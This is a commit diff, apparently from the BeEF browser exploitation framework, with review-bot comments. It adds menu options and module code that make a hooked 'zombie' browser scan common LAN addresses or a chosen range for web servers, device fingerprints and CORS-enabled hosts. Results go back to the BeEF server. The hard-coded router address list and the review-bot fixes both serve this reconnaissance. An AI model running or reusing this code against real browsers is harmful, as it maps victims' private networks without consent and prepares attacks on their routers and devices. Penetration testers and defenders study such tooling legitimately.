Add options to scan commonly used LAN IPs

Brendan Coles
2015-01-24 18:26:15 +00:00
parent d75adc0899
commit 5d9c62967d
10 changed files with 262 additions and 39 deletions


@@ -108,6 +108,12 @@
background-repeat: no-repeat;
}
.network-host-ctxMenu-web {
background-image: url(../images/icons/web.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;

Binary file not shown.



@@ -141,8 +141,170 @@ ZombieTab_Network = function(zombie) {
}
});
}
},{
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
}]
});
});
emptygrid_menu.showAt(e.getXY());
},
rowcontextmenu: function(grid, rowIndex, e) {
@@ -158,7 +320,8 @@ ZombieTab_Network = function(zombie) {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
text: 'Discover HTTP',
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
@@ -166,7 +329,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
@@ -188,7 +351,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Scanning ' + ip_range + ' for HTTP servers...');
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
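Review bot: The three 'Specify IP Range' handlers use the return value of `prompt()` unchecked, so cancelling the dialog still posts `{"ipRange":null}` and the status bar text is built with `null` in it; add `if (ip_range === null) { return; }` directly after each `prompt()` call. The six new handlers differ only in `mod_name`, the request payload and the status message, so one helper taking those three values would replace the repeated `$jwterm.ajax` blocks and keep them from drifting apart. Each request also carries `token` in the query string, where it can end up in server and proxy logs, and uses `async: false`, which blocks the panel until the response arrives; if the existing handlers do the same, that is better handled in a separate change.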


@@ -11,7 +11,7 @@ module Network
@short_name = 'network'
@full_name = 'Network'
@description = ''
@description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
end
end


@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
WorkerQueue = function(frequency) {
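Review bot: The validation pattern is handed to `match()` as a quoted string, so the string literal drops the backslashes in `\.` and `\-` and every separator dot matches any character; writing it as a regex literal (`/^…$/`) keeps the escapes and makes the check as strict as it reads. The pattern also does not require both bounds to share the first three octets, although only the fourth octet is iterated. `lowerBound` and `upperBound` stay strings, so the first `i <= upperBound` test compares text rather than numbers; `var lowerBound = parseInt(ipBounds[0].split('.')[3], 10);` (and the same for the upper bound) fixes that, and adding `var` to `ipBounds` and `ipToTest` as well stops them becoming globals, unless they are declared above the hunk. The same block is added in the favicon-scan and fingerprint module sections further down in this commit. The `beef.execute` callback starts and ends outside the hunk.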


@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
# http://caniuse.com/cors
target:


@@ -13,10 +13,36 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
var urls = new Array('/favicon.ico', '/favicon.png');
var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
// set target IP addresses
if (ipRange != null){
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
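Review bot: The sixteen-entry address list under `ipRange == 'common'` appears verbatim in the other two module sections of this commit, so a later edit to one copy can silently diverge from the others; consider defining it once and referencing it from each module. If it has to stay inline because each module is delivered on its own, a comment such as `// keep in sync with the 'common' list in the other network modules` above `ips = [` would at least flag the coupling. The hunk ends inside the `else` branch, so the rest of that block is not visible here.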


@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Get HTTP Servers (Favicon)"
description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon."
description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
target:
user_notify: ["FF", "IE", "C", "S"]


@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
// set target LAN IP addresses
if (ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
} else {
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
/* Signatures in the form of:
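Review bot: With the outer test changed from `ipRange != null` to `ipRange == 'common'`, a missing range no longer falls back to the default list but reaches `ipRange.match(...)` in the `else` branch, which throws on `null` or `undefined` unless that case is rejected above the hunk. A condition such as `if (ipRange == null || ipRange == 'common') {` keeps the earlier fallback. The loop header `for (i=lowerBound;i<=upperBound;i++)` is carried over without `var`, unlike the copy in the cross-origin module, so `i` becomes a global unless it is declared outside the hunk.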


@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>."
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]